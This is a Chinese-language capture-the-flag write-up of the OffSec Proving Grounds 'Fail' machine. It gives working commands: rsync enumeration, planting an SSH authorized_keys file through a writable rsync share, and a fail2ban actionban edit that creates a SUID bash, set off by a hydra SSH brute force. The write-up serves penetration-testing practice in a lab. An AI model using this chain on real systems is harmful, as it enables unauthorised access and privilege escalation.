Fail-白鸢的笔记

简介

point 20

Nukem

Difficulty INTERMEDIATE

rated by community INTERMEDIAT

You shall not pass.

实验环境

攻击者 Kali 192.168.45.209

受害者 IP 192.168.181.126 Linux

1. 信息收集

收集受害者服务详情

nmap -sV -A 192.168.181.126

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
873/tcp open rsync (protocol version 31)

没有80端口看到了873和22 我首先想到传ssh公钥给受害者

rsync命令

https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync

首先看一下rsync共享目录情况

root@zhyann:/tmp# nmap -sV --script "rsync-list-modules" -p 873 192.168.181.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 20:39 HKT
Nmap scan report for 192.168.181.126
Host is up (0.36s latency).

PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)
| rsync-list-modules: 
|_  fox            	fox home

共享目录内容

root@zhyann:/tmp# rsync -av --list-only rsync://192.168.181.126/fox  
receiving incremental file list
drwxr-xr-x          4,096 2021/01/21 22:21:59 .
lrwxrwxrwx              9 2020/12/04 04:22:42 .bash_history -> /dev/null
-rw-r--r--            220 2019/04/18 12:12:36 .bash_logout
-rw-r--r--          3,526 2019/04/18 12:12:36 .bashrc
-rw-r--r--            807 2019/04/18 12:12:36 .profile

sent 20 bytes  received 136 bytes  44.57 bytes/sec
total size is 4,562  speedup is 29.24

我们先生成ssh密钥对

ssh-keygen

2024-04-08_21-15

我们在/tmp中创建一个.ssh目录

并且把公钥拷贝到/tmp/.ssh目录中并改名

cp /root/.ssh/id_ed25519.pub /tmp/.ssh/authorized_keys

上传公钥

root@zhyann:/tmp# rsync -av /tmp/.ssh rsync://fox@192.168.181.126/fox
sending incremental file list
.ssh/
.ssh/authorized_keys

sent 236 bytes  received 39 bytes  78.57 bytes/sec
total size is 93  speedup is 0.34

这样我们直接ssh就可以使用密钥对来连接

2024-04-08_21-18

3. 后渗透阶段

查看网络信息家目录 SUID 定时任务都无果后

使用pspy64查看

2024-04-08_21-19

发现一个非常可疑的进程

尝试从此下手

Fail2Ban – Linux Privilege Escalation

查看/etc/passwd发现我们是属于fail2ban组

我们可以对fail2ban配置进行修改

根据上面网站的方法

vim /etc/fail2ban/action.d/iptables-multiport.conf

actionban = cp /bin/bash /tmp && chmod 4755 /tmp/bash

2024-04-08_21-23

然后使用hydra一直登录失败这样防火墙就会执行actionban的命令

hydra -l test -P /usr/share/wordlists/rockyou.txt 192.168.181.126 ssh -t 10 -v

在/tmp目录中就能找到suid的bash了直接运行提权

2024-04-08_21-24

文章版权归作者所有，未经允许请勿转载。

THE END

Offensive Security PG Practise